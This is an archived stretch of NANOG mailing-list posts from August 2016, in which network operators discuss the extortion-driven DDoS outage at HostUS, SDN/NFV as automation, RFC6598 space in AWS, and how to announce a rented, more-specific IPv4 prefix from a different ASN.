to attack their target. While I see the transit provider's point of view, it's a pretty shitty situation for their customer, and their customers/customers. > > > > -----Original Message----- > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Tony Wicks > Sent: Thursday, 4 August 2016 9:10 AM > To: 'NANOG list' > Subject: RE: Host.us DDOS attack > > Interestingly my VM (LA) with them has been effectively down for half a day as far as IPv4 is concerned. IPv6 traffic seems unaffected. 
> > > > > > From mark.tinka at seacom.mu Thu Aug 4 06:20:58 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Thu, 4 Aug 2016 08:20:58 +0200 Subject: NFV Solution Evaluation Methodology In-Reply-To: References: Message-ID: <51fc7ceb-ed11-4b88-64ee-d88925399908@seacom.mu> On 3/Aug/16 18:11, jim deleskie wrote: > I struggled with this whole SDN/NFV/insert marketing term for a while at > first, until I sat down and actually thought about it. When I strip away all > the foo, what I'm left with is breaking things down to pieces and > putting logo blocks together in a way that best suits what I'm doing. It > is really going back to the way things were a long time ago in the days of > 12/2400 baud models and 56k frame relay. It doesn't help vendors > that want to sell you overpriced foo for features you don't really need. > It lets you, if you have clue, build your own right bits. It will see some > vendors evolve, new vendors of their brand of foo appear and some vendors > die, but end of day, it's no different than most of us were doing back in the > "good ol days" The way I see it, the whole SDN/NFV talk has finally devolved into automation (separating the control and data plane is sooooo 2013). Automation is not new - a lot of networks have been automating for a long time now, albeit in custom ways that only worked for them... ummh, rephrase: was not tested in other networks. The reason I see SDN/NFV becoming a thing is just to have a standard way of automating. That's it. Mark. From phil.gardnerjr at gmail.com Wed Aug 3 16:40:11 2016 From: phil.gardnerjr at gmail.com (Phil Gardner) Date: Wed, 3 Aug 2016 12:40:11 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: One of my VPS with them is in Atlanta, and while the IPv4 address is unresponsive, the IPv6 address is working without issue. 
On 08/03/2016 11:08 AM, Soon Keat Neo wrote: > Back on topic about HostUS, I've been following a thread on LowEndTalk > where seemingly Alexander's been updating ( > https://www.lowendtalk.com/discussion/comment/1791998/#Comment_1791998) - > seems like Atlanta and LA are still down ATM based on latest reports - > nearly 10 hours now. > > Tks. > > Regards, > Neo Soon Keat > > > > 2016-08-03 22:28 GMT+08:00 Robert Webb : > >> Apologies to all as the hostname in my subject is incorrect. >> >> It should be hostus.us... >> >> >> >> On Wed, Aug 3, 2016 at 10:25 AM, Robert Webb wrote: >> >>> Not sure if it is related to the PokemonGO or not. This started around >>> 23:00 EDT last night per my monitoring. >>> >>> Seems like a pretty big attack at 300Gbps and to also temporarily take a >>> down a Tier 1 POP in a major city. >>> >>> I was interested as to if this might be a botnet or some type of >>> reflection attack. >>> >>> >>> Robert >>> >>> On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert >> wrote: >>> >>>> Well, >>>> >>>> >>>> Could it be related to the last 2 days DDoS of PokemonGO (which >>>> failed) and some other gaming sites (Blizzard and Steam)? >>>> >>>> >>>> And on the subject of CloudFlare, I'm sorry for that CloudFlare >>>> person that defended their position earlier this week, but there may be >>>> more hints (unverified) against your statements: >>>> >>>> https://twitter.com/xotehpoodle/status/756850023896322048 >>>> >>>> That could be explored. >>>> >>>> >>>> On top of which there is hints (unverified) on which is the real bad >>>> actor behind that new DDoS service: >>>> >>>> >>>> >>>> >> http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml >>>> >>>> >>>> And I quote: >>>> >>>> "One thing LeakedSource staff spotted was that the first payment >>>> recorded in the botnet's control panel was of $1, while payments for the >>>> same package plan were of $19.99." 
>>>> >>>> ( Paypal payments btw ) >>>> >>>> >>>> There is enough information, and damages, imho, to start looking for >>>> the people responsible from a legal standpoint. And hopefully the >>>> proper authorities are interested. >>>> >>>> PS: >>>> >>>> I will like to take this time to underline the lack of >>>> participation from a vast majority of ISPs into BCP38 and the like. We >>>> need to keep educating them at every occasion we have. >>>> >>>> For those that actually implemented some sort of tech against >>>> it, you are a beacon of hope in what is a ridiculous situation that has >>>> been happening for more than 15 years. >>>> >>>> ----- >>>> Alain Hebert ahebert at pubnix.net >>>> PubNIX Inc. >>>> 50 boul. St-Charles >>>> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 >>>> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 >>>> >>>> On 08/03/16 09:41, Robert Webb wrote: >>>>> Anyone have any additonal info on a DDOS attack hitting host.us? >>>>> >>>>> Woke up to no email this morning and the following from their web >> site: >>>>> >>>>> >>>>> >>>>> *Following an extortion attempt, HostUS is currently experiencing >>>> sustained >>>>> large-scale DDOS attacks against a number of locations. The attacks >> were >>>>> measured in one location at 300Gbps. In another location the attacks >>>>> temporarily knocked out the entire metropolitan POP for a Tier-1 >>>> provider. >>>>> Please be patient. We will return soon. Your understanding is >>>> appreciated. >>>>> * >>>>> >>>>> >>>>> >From my monitoring system, looks like my VPS went unavailable around >>>> 23:00 >>>>> EDT last night. 
>>>>> >>>>> Robert >>>>> >>>> >>>> >>> >> -- Phil Gardner PGP Key ID 0xFECC890C OTR Fingerprint 6707E9B8 BD6062D3 5010FE8B 36D614E3 D2F80538 From hugo at slabnet.com Thu Aug 4 15:23:42 2016 From: hugo at slabnet.com (Hugo Slabbert) Date: Thu, 4 Aug 2016 08:23:42 -0700 Subject: NFV Solution Evaluation Methodology In-Reply-To: <51fc7ceb-ed11-4b88-64ee-d88925399908@seacom.mu> References: <51fc7ceb-ed11-4b88-64ee-d88925399908@seacom.mu> Message-ID: <20160804152342.GC1207@bamboo.slabnet.com> On Thu 2016-Aug-04 08:20:58 +0200, Mark Tinka wrote: > >On 3/Aug/16 18:11, jim deleskie wrote: > >> I struggled with this whole SDN/NFV/insert marketing term for a while at >> first, until I sat down and actually thought about it. When I strip away all >> the foo, what I'm left with is breaking things down to pieces and >> putting logo blocks together in a way that best suits what I'm doing. It >> is really going back to the way things were a long time ago in the days of >> 12/2400 baud models and 56k frame relay. It doesn't help vendors >> that want to sell you overpriced foo for features you don't really need. >> It lets you, if you have clue, build your own right bits. It will see some >> vendors evolve, new vendors of their brand of foo appear and some vendors >> die, but end of day, it's no different than most of us were doing back in the >> "good ol days" > >The way I see it, the whole SDN/NFV talk has finally devolved into >automation (separating the control and data plane is sooooo 2013). > >Automation is not new - a lot of networks have been automating for a >long time now, albeit in custom ways that only worked for them... ummh, >rephrase: was not tested in other networks. > >The reason I see SDN/NFV becoming a thing is just to have a standard way >of automating. That's it. That somewhat mirrors my take on it. At the risk of being flamed to hell, I see SDN/NFV being to network operations as DevOps/CI/CM/containers are to dev and systems. 
Both are bringing in new tools and such, but ultimately they *require* solid automation and having your house (systems, processes workflow) in order to be able to deploy, with the hype train providing budget allocation and sufficient buy-in to get it to fly. You can do network automation and service provisioning without NFV and centralized SDN controllers, and you can do CM and good tooling without going headlong into DevOps. Obviously SDN/NFV and DevOps have their own pieces that layer on top of that (e.g. control plane / forwarding plane separation and commoditization of the forwarding hardware in the former; development model and "culture" in the latter), and you have to sift through the hype and buzzword bingo to find what if any of that would deliver value in your environment. But, that doesn't mean we can't benefit from the advances and possible standardization in tooling and automation that come along for the ride. > >Mark. -- Hugo Slabbert | email, xmpp/jabber: hugo at slabnet.com pgp key: B178313E | also on Signal From rwfireguru at gmail.com Thu Aug 4 16:03:11 2016 From: rwfireguru at gmail.com (Robert Webb) Date: Thu, 4 Aug 2016 12:03:11 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: Looks like ATL01 is down again hard. Although, as someone else mentioned earlier, IPv6 seems to be just fine. Robert On Wed, Aug 3, 2016 at 12:40 PM, Phil Gardner wrote: > One of my VPS with them is in Atlanta, and while the IPv4 address is > unresponsive, the IPv6 address is working without issue. 
> > > On 08/03/2016 11:08 AM, Soon Keat Neo wrote: > > Back on topic about HostUS, I've been following a thread on LowEndTalk > > where seemingly Alexander's been updating ( > > https://www.lowendtalk.com/discussion/comment/1791998/#Comment_1791998) > - > > seems like Atlanta and LA are still down ATM based on latest reports - > > nearly 10 hours now. > > > > Tks. > > > > Regards, > > Neo Soon Keat > > > > > > > > 2016-08-03 22:28 GMT+08:00 Robert Webb : > > > >> Apologies to all as the hostname in my subject is incorrect. > >> > >> It should be hostus.us... > >> > >> > >> > >> On Wed, Aug 3, 2016 at 10:25 AM, Robert Webb > wrote: > >> > >>> Not sure if it is related to the PokemonGO or not. This started around > >>> 23:00 EDT last night per my monitoring. > >>> > >>> Seems like a pretty big attack at 300Gbps and to also temporarily take > a > >>> down a Tier 1 POP in a major city. > >>> > >>> I was interested as to if this might be a botnet or some type of > >>> reflection attack. > >>> > >>> > >>> Robert > >>> > >>> On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert > >> wrote: > >>> > >>>> Well, > >>>> > >>>> > >>>> Could it be related to the last 2 days DDoS of PokemonGO (which > >>>> failed) and some other gaming sites (Blizzard and Steam)? > >>>> > >>>> > >>>> And on the subject of CloudFlare, I'm sorry for that CloudFlare > >>>> person that defended their position earlier this week, but there may > be > >>>> more hints (unverified) against your statements: > >>>> > >>>> https://twitter.com/xotehpoodle/status/756850023896322048 > >>>> > >>>> That could be explored. 
> >>>> > >>>> > >>>> On top of which there is hints (unverified) on which is the real > bad > >>>> actor behind that new DDoS service: > >>>> > >>>> > >>>> > >>>> > >> > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > >>>> > >>>> > >>>> And I quote: > >>>> > >>>> "One thing LeakedSource staff spotted was that the first > payment > >>>> recorded in the botnet's control panel was of $1, while payments for > the > >>>> same package plan were of $19.99." > >>>> > >>>> ( Paypal payments btw ) > >>>> > >>>> > >>>> There is enough information, and damages, imho, to start looking > for > >>>> the people responsible from a legal standpoint. And hopefully the > >>>> proper authorities are interested. > >>>> > >>>> PS: > >>>> > >>>> I will like to take this time to underline the lack of > >>>> participation from a vast majority of ISPs into BCP38 and the like. > We > >>>> need to keep educating them at every occasion we have. > >>>> > >>>> For those that actually implemented some sort of tech against > >>>> it, you are a beacon of hope in what is a ridiculous situation that > has > >>>> been happening for more than 15 years. > >>>> > >>>> ----- > >>>> Alain Hebert ahebert at pubnix.net > >>>> PubNIX Inc. > >>>> 50 boul. St-Charles > >>>> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > >>>> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > >>>> > >>>> On 08/03/16 09:41, Robert Webb wrote: > >>>>> Anyone have any additonal info on a DDOS attack hitting host.us? > >>>>> > >>>>> Woke up to no email this morning and the following from their web > >> site: > >>>>> > >>>>> > >>>>> > >>>>> *Following an extortion attempt, HostUS is currently experiencing > >>>> sustained > >>>>> large-scale DDOS attacks against a number of locations. The attacks > >> were > >>>>> measured in one location at 300Gbps. 
In another location the attacks > >>>>> temporarily knocked out the entire metropolitan POP for a Tier-1 > >>>> provider. > >>>>> Please be patient. We will return soon. Your understanding is > >>>> appreciated. > >>>>> * > >>>>> > >>>>> > >>>>> >From my monitoring system, looks like my VPS went unavailable around > >>>> 23:00 > >>>>> EDT last night. > >>>>> > >>>>> Robert > >>>>> > >>>> > >>>> > >>> > >> > > -- > Phil Gardner > PGP Key ID 0xFECC890C > OTR Fingerprint 6707E9B8 BD6062D3 5010FE8B 36D614E3 D2F80538 > From morrowc.lists at gmail.com Thu Aug 4 17:35:29 2016 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Thu, 4 Aug 2016 13:35:29 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: "it's good that there aren't any easy solutions to this sort of problem..." On Thu, Aug 4, 2016 at 12:03 PM, Robert Webb wrote: > Looks like ATL01 is down again hard. > > Although, as someone else mentioned earlier, IPv6 seems to be just fine. > > Robert > > On Wed, Aug 3, 2016 at 12:40 PM, Phil Gardner > wrote: > > > One of my VPS with them is in Atlanta, and while the IPv4 address is > > unresponsive, the IPv6 address is working without issue. > > > > > > On 08/03/2016 11:08 AM, Soon Keat Neo wrote: > > > Back on topic about HostUS, I've been following a thread on LowEndTalk > > > where seemingly Alexander's been updating ( > > > https://www.lowendtalk.com/discussion/comment/1791998/#Comment_1791998 > ) > > - > > > seems like Atlanta and LA are still down ATM based on latest reports - > > > nearly 10 hours now. > > > > > > Tks. > > > > > > Regards, > > > Neo Soon Keat > > > > > > > > > > > > 2016-08-03 22:28 GMT+08:00 Robert Webb : > > > > > >> Apologies to all as the hostname in my subject is incorrect. > > >> > > >> It should be hostus.us... 
> > >> > > >> > > >> > > >> On Wed, Aug 3, 2016 at 10:25 AM, Robert Webb > > wrote: > > >> > > >>> Not sure if it is related to the PokemonGO or not. This started > around > > >>> 23:00 EDT last night per my monitoring. > > >>> > > >>> Seems like a pretty big attack at 300Gbps and to also temporarily > take > > a > > >>> down a Tier 1 POP in a major city. > > >>> > > >>> I was interested as to if this might be a botnet or some type of > > >>> reflection attack. > > >>> > > >>> > > >>> Robert > > >>> > > >>> On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert > > >> wrote: > > >>> > > >>>> Well, > > >>>> > > >>>> > > >>>> Could it be related to the last 2 days DDoS of PokemonGO (which > > >>>> failed) and some other gaming sites (Blizzard and Steam)? > > >>>> > > >>>> > > >>>> And on the subject of CloudFlare, I'm sorry for that CloudFlare > > >>>> person that defended their position earlier this week, but there may > > be > > >>>> more hints (unverified) against your statements: > > >>>> > > >>>> https://twitter.com/xotehpoodle/status/756850023896322048 > > >>>> > > >>>> That could be explored. > > >>>> > > >>>> > > >>>> On top of which there is hints (unverified) on which is the real > > bad > > >>>> actor behind that new DDoS service: > > >>>> > > >>>> > > >>>> > > >>>> > > >> > > http://news.softpedia.com/news/pokemon-go-ddos-attacks- > postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > > >>>> > > >>>> > > >>>> And I quote: > > >>>> > > >>>> "One thing LeakedSource staff spotted was that the first > > payment > > >>>> recorded in the botnet's control panel was of $1, while payments for > > the > > >>>> same package plan were of $19.99." > > >>>> > > >>>> ( Paypal payments btw ) > > >>>> > > >>>> > > >>>> There is enough information, and damages, imho, to start looking > > for > > >>>> the people responsible from a legal standpoint. And hopefully the > > >>>> proper authorities are interested. 
> > >>>> > > >>>> PS: > > >>>> > > >>>> I will like to take this time to underline the lack of > > >>>> participation from a vast majority of ISPs into BCP38 and the like. > > We > > >>>> need to keep educating them at every occasion we have. > > >>>> > > >>>> For those that actually implemented some sort of tech > against > > >>>> it, you are a beacon of hope in what is a ridiculous situation that > > has > > >>>> been happening for more than 15 years. > > >>>> > > >>>> ----- > > >>>> Alain Hebert ahebert at pubnix.net > > >>>> PubNIX Inc. > > >>>> 50 boul. St-Charles > > >>>> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > > >>>> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > > >>>> > > >>>> On 08/03/16 09:41, Robert Webb wrote: > > >>>>> Anyone have any additonal info on a DDOS attack hitting host.us? > > >>>>> > > >>>>> Woke up to no email this morning and the following from their web > > >> site: > > >>>>> > > >>>>> > > >>>>> > > >>>>> *Following an extortion attempt, HostUS is currently experiencing > > >>>> sustained > > >>>>> large-scale DDOS attacks against a number of locations. The attacks > > >> were > > >>>>> measured in one location at 300Gbps. In another location the > attacks > > >>>>> temporarily knocked out the entire metropolitan POP for a Tier-1 > > >>>> provider. > > >>>>> Please be patient. We will return soon. Your understanding is > > >>>> appreciated. > > >>>>> * > > >>>>> > > >>>>> > > >>>>> >From my monitoring system, looks like my VPS went unavailable > around > > >>>> 23:00 > > >>>>> EDT last night. > > >>>>> > > >>>>> Robert > > >>>>> > > >>>> > > >>>> > > >>> > > >> > > > > -- > > Phil Gardner > > PGP Key ID 0xFECC890C > > OTR Fingerprint 6707E9B8 BD6062D3 5010FE8B 36D614E3 D2F80538 > > > From arlingtonalbertson at gmail.com Thu Aug 4 22:52:53 2016 From: arlingtonalbertson at gmail.com (Arlington Albertson) Date: Thu, 04 Aug 2016 22:52:53 +0000 Subject: RFC6598 in AWS? 
Message-ID: Hey folks, We've filed a support ticket to find out the supported level for this range, but I wanted to see if there was anyone out there who'd experienced using the 100.64.0.0/10 space in AWS? Thanks, -AA From andrew at vianet.ca Thu Aug 4 19:39:55 2016 From: andrew at vianet.ca (Andrew) Date: Thu, 04 Aug 2016 15:39:55 -0400 Subject: Advertising rented IPv4 prefix from a different ASN. Message-ID: Hello List, I work for a medium-sized ISP. We are entering an agreement to rent some IPv4 space from a local higher education institution. Being a multi-homed ISP we would like to advertise the rented prefix from our ASN. The prefix that will be advertised is a smaller subnet from the higher education's block; they will continue to advertise the larger prefix. What is the best way to accomplish this? Is there any way of doing this without having to tunnel the traffic through the origin ASN? I feel if we just advertise the prefix it will get put on a bogon list for prefix hijacking. This space is rented long term but they are not interested in reassigning the space to us. They also want to keep advertising their prefix as one contiguous block. I appreciate any insight and information. Thank you for your time, Andrew. From neo at soonke.at Fri Aug 5 13:40:24 2016 From: neo at soonke.at (Soon Keat Neo) Date: Fri, 5 Aug 2016 21:40:24 +0800 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: If you are just announcing more specific address space that you've obtained legitimately off their assigned address space, it should be no problem, just obtain an LoA and register it on the different databases and you should be set to ask your upstreams to allow the announcements. Regards, Neo Soon Keat 2016-08-05 3:39 GMT+08:00 Andrew : > Hello List, > > I work for a medium-sized ISP. We are entering an agreement to rent some > IPv4 space from a local higher education institution. 
Being a multi-homed > ISP we would like to advertise the rented prefix from our ASN. The prefix > that will be advertised is a smaller subnet from the higher education's > block; they will continue to advertise the larger prefix. > > What is the best way to accomplish this? Is there any way of doing this > without having to tunnel the traffic through the origin ASN? > > I feel if we just advertise the prefix it will get put on a bogon list for prefix > hijacking. This space is rented long term but they are not interested in > reassigning the space to us. They also want to keep advertising their > prefix as one contiguous block. > > I appreciate any insight and information. > Thank you for your time, > Andrew. > From nanog at stefan-neufeind.de Fri Aug 5 13:41:59 2016 From: nanog at stefan-neufeind.de (Stefan Neufeind) Date: Fri, 5 Aug 2016 15:41:59 +0200 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: <6ec2b899-59ce-c932-9b1a-fbe835c8bd8a@stefan-neufeind.de> On 04.08.2016 21:39, Andrew wrote: > Hello List, > > I work for a medium-sized ISP. We are entering an agreement to rent > some IPv4 space from a local higher education institution. Being a > multi-homed ISP we would like to advertise the rented prefix from our > ASN. The prefix that will be advertised is a smaller subnet from the > higher education's block; they will continue to advertise the larger prefix. > > What is the best way to accomplish this? Is there any way of doing this > without having to tunnel the traffic through the origin ASN? > > I feel if we just advertise the prefix it will get put on a bogon list for > prefix hijacking. This space is rented long term but they are not > interested in reassigning the space to us. They also want to keep > advertising their prefix as one contiguous block. Make sure proper route-objects exist. Should be no big deal then imho. 
Others do it as well - also advertising the larger block from one ASN and a smaller portion of it from another. Kind regards, Stefan From JJaritsch at anexia-it.com Fri Aug 5 13:41:41 2016 From: JJaritsch at anexia-it.com (Jürgen Jaritsch) Date: Fri, 5 Aug 2016 13:41:41 +0000 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: <585720d0f1ac4d6c94ca4c6805478acb@anx-i-dag02.anx.local> Just create a more specific route object (for the /nn you plan to announce) at your RIR, ask the institute to sign an LOA and inform your upstreams. Announcing the more specific is nothing unusual. Jürgen Jaritsch Head of Network & Infrastructure ANEXIA Internetdienstleistungs GmbH Phone: +43-5-0556-300 Fax: +43-5-0556-500 E-mail: jjaritsch at anexia-it.com Web: http://www.anexia.at Headquarters address, Klagenfurt: Feldkirchnerstraße 140, 9020 Klagenfurt Managing Director: Alexander Windbichler Company register: FN 289918a | Place of jurisdiction: Klagenfurt | VAT ID: AT U63216601 -----Original Message----- From: Andrew [andrew at vianet.ca] Received: Friday, 05 Aug. 2016, 15:33 To: nanog at nanog.org [nanog at nanog.org] Subject: Advertising rented IPv4 prefix from a different ASN. Hello List, I work for a medium-sized ISP. We are entering an agreement to rent some IPv4 space from a local higher education institution. Being a multi-homed ISP we would like to advertise the rented prefix from our ASN. The prefix that will be advertised is a smaller subnet from the higher education's block; they will continue to advertise the larger prefix. What is the best way to accomplish this? Is there any way of doing this without having to tunnel the traffic through the origin ASN? I feel if we just advertise the prefix it will get put on a bogon list for prefix hijacking. This space is rented long term but they are not interested in reassigning the space to us. They also want to keep advertising their prefix as one contiguous block. 
I appreciate any insight and information. Thank you for your time, Andrew. From mark.tinka at seacom.mu Fri Aug 5 13:52:25 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Fri, 5 Aug 2016 15:52:25 +0200 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> On 5/Aug/16 15:40, Soon Keat Neo wrote: > If you are just announcing more specific address space that you've obtained > legitimately off their assigned address space, it should be no problem, > just obtain an LoA and register it on the different databases and you > should be set to ask your upstreams to allow the announcements. Do people actually do this? A customer asked us to do this for them and we refused, because inconsistent AS has never been a thing. I'm apprehensive about a subnet and its aggregate appearing from multiple AS's at the same time. But, I'm old school, so... Mark. From bob at FiberInternetCenter.com Fri Aug 5 13:57:16 2016 From: bob at FiberInternetCenter.com (Bob Evans) Date: Fri, 5 Aug 2016 06:57:16 -0700 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: <89b9a63cac7126e6515aac975bb1a801.squirrel@66.201.44.180> Hi Andrew, It is possible, but I would do it.... Here is how and why. If they announce the larger CIDR you will need to keep them as one of your ISPs or you risk losing traffic due to others' inbound policy filtering. However, if they provide you a simple Letter of Authorization to announce the smaller rented CIDR you can use this letter to show other networks that you have the right to announce it and they can email/call to confirm. By announcing the smaller CIDR to others you should see the bulk of the traffic come in via the other backbones. You can "not reliably" multi-home the IPs without keeping the institution as one of your backbone providers (reason I wouldn't do it). 
You will always need a peering session with them where you announce to them your CIDR or they static route that traffic to you. Thank You Bob Evans CTO > Hello List, > > I work for a medium sized ISP. We are entering an agreement to rent > some IPv4 space from a local higher education institution. Being a > multi-homed ISP we would like to advertise the rented prefix from our > ASN. The prefix that will be advertised is a smaller subnet from the > higher education's block; they will continue to advertise the larger > prefix. > > What is the best way to accomplish this? Is there any way of doing this > without having to tunnel the traffic through the origin ASN? > > I feel if we just advertise the prefix it will get put on a bogon list for > prefix hijacking. This space is rented long term but they are not > interested in reassigning the space to us. They also want to keep > advertising their prefix as one contiguous block. > > I appreciate any insight and information. > Thank you for your time, > Andrew. > From blake at ispn.net Fri Aug 5 14:01:40 2016 From: blake at ispn.net (Blake Hudson) Date: Fri, 5 Aug 2016 09:01:40 -0500 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: Andrew wrote on 8/4/2016 2:39 PM: > This space is rented long term but they are not interested in > reassigning the space to us. Isn't this a violation of their agreement with ARIN (https://www.arin.net/resources/request/reassignments.html)? From bob at FiberInternetCenter.com Fri Aug 5 14:06:16 2016 From: bob at FiberInternetCenter.com (Bob Evans) Date: Fri, 5 Aug 2016 07:06:16 -0700 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: <21d31b0a1d55335d88e784cf0b3b0b1c.squirrel@66.201.44.180> It's possible that it is a university that has legacy IPs. You have to check. 
Thank You Bob Evans CTO > Andrew wrote on 8/4/2016 2:39 PM: >> This space is rented long term but they are not interested in >> reassigning the space to us. > > Isn't this a violation of their agreement with ARIN > (https://www.arin.net/resources/request/reassignments.html)? > > > > > From davidbass570 at gmail.com Fri Aug 5 14:10:41 2016 From: davidbass570 at gmail.com (David Bass) Date: Fri, 5 Aug 2016 10:10:41 -0400 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> References: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> Message-ID: > On Aug 5, 2016, at 9:52 AM, Mark Tinka wrote: > > > >> On 5/Aug/16 15:40, Soon Keat Neo wrote: >> >> If you are just announcing more specific address space that you've obtained >> legitimately off their assigned address space, it should be no problem, >> just obtain an LoA and register it on the different databases and you >> should be set to ask your upstreams to allow the announcements. > > Do people actually do this? A customer asked us to do this for them and > we refused, because inconsistent AS has never been a thing. > > I'm apprehensive about a subnet and its aggregate appearing from > multiple AS's at the same time. But, I'm old school, so... > > Mark. I agree with you...not a great practice. Each AS should just announce the prefix that they actually use. The school could be used as a transit for the ISP, which may be undesirable. From chris.welti at switch.ch Fri Aug 5 14:27:34 2016 From: chris.welti at switch.ch (Chris Welti) Date: Fri, 5 Aug 2016 16:27:34 +0200 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: I would not recommend to do that. If you really do this, please make sure that the owner of the supernet (in this case the university) also does transit for the subnet (which they should as they are supposed to accept and forward traffic for the whole aggregate that they are announcing). 
Otherwise, for networks that only do partial routing (basically defaults from transits + peering routes), this will create a blackhole in case they peer with the ISP that announces only the supernet, but not with the ISP that announces the subnet, because traffic will always be routed towards the announcement of the supernet only. Same applies if the subnet gets filtered by some people for policy reasons (like no more-specifics of PA space, or smaller than /24...). Also, be careful that the owner of the supernet doesn't apply inbound anti-spoofing filters at their borders towards transits and peers for traffic from your subnet that is part of their supernet. Chris On 04/08/16 21:39, Andrew wrote: > Hello List, > > I work for a medium sized ISP. We are entering an agreement to rent > some IPv4 space from a local higher education institution. Being a > multi-homed ISP we would like to advertise the rented prefix from our > ASN. The prefix that will be advertised is a smaller subnet from the > higher education's block; they will continue to advertise the larger > prefix. > > What is the best way to accomplish this? Is there any way of doing this > without having to tunnel the traffic through the origin ASN? > > I feel if we just advertise the prefix it will get put on a bogon list for > prefix hijacking. This space is rented long term but they are not > interested in reassigning the space to us. They also want to keep > advertising their prefix as one contiguous block. > > I appreciate any insight and information. > Thank you for your time, > Andrew. > From tore at fud.no Fri Aug 5 14:38:37 2016 From: tore at fud.no (Tore Anderson) Date: Fri, 5 Aug 2016 16:38:37 +0200 Subject: Advertising rented IPv4 prefix from a different ASN. 
In-Reply-To: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> References: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> Message-ID: <20160805163837.7d22deb7@envy.e1.y.home> * Mark Tinka > On 5/Aug/16 15:40, Soon Keat Neo wrote: > > > If you are just announcing more specific address space that you've > > obtained legitimately off their assigned address space, it should > > be no problem, just obtain an LoA and register it on the different > > databases and you should be set to ask your upstreams to allow the > > announcements. > > Do people actually do this? Just as an example: There are hundreds of more-specifics coming out of 8/8 that has a different origin AS than 8/8 itself, so yes, people do. Tore From neo at soonke.at Fri Aug 5 15:28:49 2016 From: neo at soonke.at (Soon Keat Neo) Date: Fri, 5 Aug 2016 23:28:49 +0800 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: <20160805163837.7d22deb7@envy.e1.y.home> References: <466f8b9b-8fbe-82be-f4fa-a1fd37896359@seacom.mu> <20160805163837.7d22deb7@envy.e1.y.home> Message-ID: I'm not sure how bad of a practice it really is, however, I've seen it in use in multiple networks and ASes who sublet their IP space, and far as I've known, seem to work fine for most networks. Of course, this may also cause the University itself to be subject to unwanted traffic if for example the BGP session announcing the subletted space goes down. And, whether this violates the RIR regulations is another thing altogether. SoonKeat Regards, Neo Soon Keat 2016-08-05 22:38 GMT+08:00 Tore Anderson : > * Mark Tinka > > > On 5/Aug/16 15:40, Soon Keat Neo wrote: > > > > > If you are just announcing more specific address space that you've > > > obtained legitimately off their assigned address space, it should > > > be no problem, just obtain an LoA and register it on the different > > > databases and you should be set to ask your upstreams to allow the > > > announcements. > > > > Do people actually do this? 
> > Just as an example: There are hundreds of more-specifics coming out of > 8/8 that has a different origin AS than 8/8 itself, so yes, people do. > > Tore > From bill at herrin.us Fri Aug 5 15:47:49 2016 From: bill at herrin.us (William Herrin) Date: Fri, 5 Aug 2016 11:47:49 -0400 Subject: Advertising rented IPv4 prefix from a different ASN. In-Reply-To: References: Message-ID: On Fri, Aug 5, 2016 at 10:01 AM, Blake Hudson wrote: > Andrew wrote on 8/4/2016 2:39 PM: >> This space is rented long term but they are not interested in reassigning >> the space to us. > > > Isn't this a violation of their agreement with ARIN > (https://www.arin.net/resources/request/reassignments.html)? If the space in question is post-1997 then yes, either renting space as an "end user" or failing to swip reassigned space as an ISP violates their agreement with ARIN. It could be reported as fraud making everybody unhappy. If the edu's space is a legacy assignment then they have no agreement with ARIN to violate. On a more practical level, you'll encounter three kinds of trouble: 1. Despite your best efforts, the school will receive some packets intended for you. Make sure you have a tunnel in place to catch them. 2. Reverse path filtering may trip you up if the school hasn't already addressed that with their ISPs. 3. Their own internal firewalls and access control mechanisms which have, over the years, been programmed to act on their entire address space. Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: From theodore at ciscodude.net Fri Aug 5 16:04:22 2016 From: theodore at ciscodude.net (Theodore Baschak) Date: Fri, 5 Aug 2016 11:04:22 -0500 Subject: Advertising rented IPv4 prefix from a different ASN. 
